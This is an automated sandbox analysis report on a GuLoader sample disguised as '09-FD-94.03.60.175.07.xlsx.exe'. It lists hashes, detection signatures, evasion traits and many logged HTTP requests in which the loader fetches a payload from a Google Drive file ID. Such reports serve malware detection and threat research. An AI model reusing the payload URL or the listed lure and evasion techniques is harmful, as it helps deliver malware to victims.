Edit tour

Windows Analysis Report
09-FD-94.03.60.175.07.xlsx.exe

Overview

General Information

Sample name:	09-FD-94.03.60.175.07.xlsx.exe
Analysis ID:	1576274
MD5:	321a9608e5bf03bf63f4574d0df1a380
SHA1:	71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
SHA256:	c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
Tags:	exeuser-Racco42
Infos:

Detection

GuLoader

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Yara detected GuLoader

AI detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

09-FD-94.03.60.175.07.xlsx.exe (PID: 964 cmdline: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe" MD5: 321A9608E5BF03BF63F4574D0DF1A380)

09-FD-94.03.60.175.07.xlsx.exe (PID: 5412 cmdline: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe" MD5: 321A9608E5BF03BF63F4574D0DF1A380)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2290371684.0000000007D83000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.4016458454.0000000004A43000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, NewProcessName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, OriginalFileName: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe", ProcessId: 964, ProcessName: 09-FD-94.03.60.175.07.xlsx.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T18:05:19.641089+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49756	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 09-FD-94.03.60.175.07.xlsx.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: 09-FD-94.03.60.175.07.xlsx.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.6:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49922 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:49993 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50027 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.6:50029 version: TLS 1.2

Source: 09-FD-94.03.60.175.07.xlsx.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	0_2_004057D0
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_0040628B FindFirstFileW,FindClose,	0_2_0040628B
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_00402770 FindFirstFileW,	2_2_00402770
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,	2_2_004057D0
Source: C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe	Code function: 2_2_0040628B FindFirstFileW,FindClose,	2_2_0040628B

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49756 -> 172.217.19.174:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=bvrDV2ly_DXfe-g58fqf4TsGJmCvscuJ2LfXxjUQ0KhA4lPf5B-O1qwkH64XwA8wvdGrpf_jpmA2IFFkkg8FoaPDXe4Ia53Sm8vTQHMg9XlMWFinP66ZzlsZVcvJJzFhTHu0YdlNDt3cTx_JXc9ClrLjDbqTurW7R1LG_LjmoGEYHVxsdz4rwGU
